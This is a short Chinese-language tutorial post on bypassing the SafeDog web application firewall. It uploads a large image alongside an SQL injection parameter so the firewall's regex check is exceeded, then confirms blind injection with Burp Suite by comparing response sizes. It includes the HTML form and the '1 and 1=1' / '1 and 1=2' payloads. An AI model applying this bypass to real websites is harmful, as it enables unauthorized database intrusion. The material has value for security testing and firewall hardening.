1. 程式人生 > >繞過網站安全狗(圖片繞過)

繞過網站安全狗(圖片繞過)

當我們在滲透一個網站的時候,很多時候,會遇到下面這種情況。網站裝有安全狗,把我們的SQL注入語句給攔截了。

這就是網站的安全狗

此時,我們的滲透會陷入僵局。到底應該如何才能讓我們的語句繞過安全狗的檢查呢?

我們可以自己寫一個頁面,該頁面可以向網站提交資料,我們在提交資料的同時還提交一張圖片,由於圖片的資料過大,超過了安全狗的正則匹配的字元,我們就可以繞過了

<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
   <form action="http://192.168.10.14/cat.php?id=1" method="POST" enctype="multipart/form-data">
       File: <input type="file" name="file"/> <br/>
       ID: <input type="text" name="id" value="1 and 1=1" style="width=400px;"/> <br/>
       <input type="submit" value="提交"/>
   </form>
</body>
</html>

我們隨便選擇本地一張照片和我們的SQL語句一起提交

然後用BrupSuite抓包,送到Repeater模組,拉到請求資料的最後,點擊發送。我們可以看到,當傳送的資料是 1 and 1=1的時候,回覆的位元組數是 2649個位元組

 然後我們修改為  1  and  1=2 ,位元組數是2130個位元組,很明顯,這裡存在盲注。而且我們已經繞過安全狗的檢測了。